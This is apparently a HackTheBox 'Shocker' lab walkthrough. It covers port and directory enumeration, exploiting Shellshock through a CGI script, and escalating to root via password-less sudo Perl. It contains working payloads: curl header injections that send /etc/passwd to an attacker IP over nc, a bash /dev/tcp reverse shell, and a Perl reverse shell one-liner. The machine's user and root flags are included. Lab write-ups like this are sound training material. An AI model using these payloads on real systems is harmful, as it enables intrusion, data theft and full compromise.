HackTheBox | Shocker

HackTheBox | Shocker

2 months ago   •   8 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.93 scan initiated Tue Mar 28 14:16:18 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.239.87
Nmap scan report for 10.129.239.87
Host is up (0.019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   47.78 ms 10.10.14.1
2   48.81 ms 10.129.239.87

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 28 14:16:48 2023 -- 1 IP address (1 host up) scanned in 30.90 seconds





Service Enumeration

TCP/80

Gobuster Enumeration

gobuster dir -u http://10.129.239.87 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html -t 100 -o gobuster.txt

/.htaccess.php        (Status: 403) [Size: 301]
/.htaccess.html       (Status: 403) [Size: 302]
/.htpasswd.php        (Status: 403) [Size: 301]
/.htpasswd            (Status: 403) [Size: 297]
/.htpasswd.html       (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 297]
/cgi-bin/.html        (Status: 403) [Size: 301]
/cgi-bin/             (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 301]

Nothing interesting to go with here. Will have to enumerate some more. The server likely returned an HTTP 403 on /cgi-bin/ due to disallowing directory enumeration. That doesn't mean we can't try and enumerate more files and directories and see if we get any other status codes.





CGI Enumeration

What is Common Gateway Interface? | How It Works | Skill & Career Move
Guide to What is Common Gateway Interface?. Here we discussed the working, required skills, career growth and advantages of Common Gateway Interface.
CGI applications can be written in any programming language.
The most common ones are languages like Perl, PHP and Python, and things like that tend to be simple languages. For this reason, CGI applications are often called CGI scripts because they tend to be scripting languages, and they are often called CGI scripts.

They can be written in any programming languages like ASP or Java, or even C++ can be used, but it is important to note that CGI application runs in the server.
gobuster dir -u http://10.129.239.87/cgi-bin/ \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-x php,pl,py,sh \
-t 200 \
-o gobuster.txt
Use a standard wordlist while checking for common script extensions

Interesting, looks like there is a user.sh script that is accessible. Let's check it out.

So, here's what we know at this point:

  • We've got a CGI script
  • And, it's likely written in Bash

Let's try Googling to see what we come up with:

Seeing a majority of the results talking about Shellshock. Let's take a look at the Exploit DB write-up to learn more about the exploit.

A series of random characters, () { :; }; , confuses Bash because it doesn't know what to do with them, so by default, it executes the code after it.
...Bash can have internal function declaration in its environment variable. The first version of the vulnerability is related to the ability to run arbitrary commands after a function declaration.

On page 4 of the PDF, we see that the author does the following:

  1. Proxy a request to the CGI script through Burp
  2. Edit the User-Agent header with () { :;}; command 1; command 2; etc...

This works, because the CGI script will be executed by the Bash interpreter on the server and the User-Agent string is parsed as an environment variable by the web server. It sees () { :;}; as a legitimate function and executes the chained commands.





Testing the Shellshock Vulnerbility

In the PDF, the author is using Burp, but we can easily inject our own User-Agent header (or other headers) using curl.

Target Side
# Set some variables to hold the payload
ATTACK_IP='10.10.14.3'
ATTACK_PORT=80
PWN="() { :;}; /bin/bash -c 'nc -n $ATTACK_IP $ATTACK_PORT < /etc/passwd'"

# Use curl to inject payload in to a few headers
curl http://10.129.239.87/cgi-bin/user.sh \
-H "User-Agent: $PWN" \
-H "Cookie: $PWN" \
-H "Referer: $PWN" -v

# Clear the variable
unset PWN
POC Payload

Let's make sense of the test exploit:

  1. Set a payload in the PWN variable, so we don't have to write it out in each header
  2. The payload in $PWN is going to read /etc/passwd on the target and send the file over TCP port 80 to a listener on Kali (be sure to change your IP and port as needed)
  3. Use curl and inject the $PWN variable in a few headers using -H
  4. Unset the $PWN variable



Kali Side
sudo nc -lnvp 80 > /dev/stdout
Start a listener matching the port in the payload





Exploit

The web server running on the target is using a Bash CGI script and a version of Bash that is vulnerable to the Shellshock vulnerability. The only way to mitigate this vulnerability is to either disable the vulnerable CGI script, but ideally, the system administrator should upgrade to a version of Bash that has been patched.

Let's use the previous POC from above to establish a reverse shell on the target

Target Side
# Set some variables to hold the payload
ATTACK_IP='10.10.14.3'
ATTACK_PORT=80
PWN="() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACK_IP/$ATTACK_PORT 0>&1 &'"

# Use curl to inject payload in to a few headers
curl http://10.129.239.87/cgi-bin/user.sh \
-H "User-Agent: $PWN" \
-H "Cookie: $PWN" \
-H "Referer: $PWN" -v

# Clear the variable
unset PWN



Kali Side
sudo rlwrap nc -lnvp 80
Start a listener matching the port in the payload





Post-Exploit Enumeration

Current User

Click to expand
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
    
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl



OS & Kernel

Click to expand
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial



Users

Click to expand
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash



Groups

Click to expand
shelly:x:1000:



Network

Interfaces
ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:90:c0 brd ff:ff:ff:ff:ff:ff
    inet 10.129.239.87/16 brd 10.129.255.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:90c0/64 scope global mngtmpaddr dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:90c0/64 scope link 
       valid_lft forever preferred_lft forever


ARP Table
N/A


Routes
N/A


Open Ports
All ports previously enumerated


Ping Sweep
N/A



Processes

Click to expand
No interesting processes owned by shelly or root



Services

Click to expand
UNIT                            LOAD   ACTIVE SUB     DESCRIPTION
acpid.path                      loaded active running ACPI Events Check
init.scope                      loaded active running System and Service Manager
accounts-daemon.service         loaded active running Accounts Service
acpid.service                   loaded active running ACPI event daemon
apache2.service                 loaded active running LSB: Apache2 web server
atd.service                     loaded active running Deferred execution scheduler
cron.service                    loaded active running Regular background program processing daemon
dbus.service                    loaded active running D-Bus System Message Bus
getty@tty1.service              loaded active running Getty on tty1
iscsid.service                  loaded active running iSCSI initiator daemon (iscsid)
lvm2-lvmetad.service            loaded active running LVM2 metadata daemon
lxcfs.service                   loaded active running FUSE filesystem for LXC
mdadm.service                   loaded active running LSB: MD monitoring daemon
open-vm-tools.service           loaded active running Service for virtual machines hosted on VMware
polkitd.service                 loaded active running Authenticate and Authorize Users to Run Privileged Tasks
rsyslog.service                 loaded active running System Logging Service
snapd.service                   loaded active running Snappy daemon
ssh.service                     loaded active running OpenBSD Secure Shell server
systemd-journald.service        loaded active running Journal Service
systemd-logind.service          loaded active running Login Service
systemd-timesyncd.service       loaded active running Network Time Synchronization
systemd-udevd.service           loaded active running udev Kernel Device Manager
acpid.socket                    loaded active running ACPID Listen Socket
dbus.socket                     loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket             loaded active running LVM2 metadata daemon socket
snapd.socket                    loaded active running Socket activation for snappy daemon
syslog.socket                   loaded active running Syslog Socket
systemd-journald-audit.socket   loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket         loaded active running Journal Socket
systemd-udevd-control.socket    loaded active running udev Control Socket
systemd-udevd-kernel.socket     loaded active running udev Kernel Socket



Scheduled Tasks

Click to expand
N/A





Privilege Escalation

The obvious path to escalate our privileges is the password-less sudo privilege running /usr/bin/perl as root. We should be able to do a Perl one-liner to get another reverse shell back on our attack box.

Reverse Shell Cheat Sheet | pentestmonkey
This page includes a Perl payload
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.3";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' &
Change your IP and port in the payload!





Flags

User
345c643b4fcdeddb5a362a6732fe3ea1


Root
1b104c3f8ba118ff6651b53083a8b378

Spread the word

Keep reading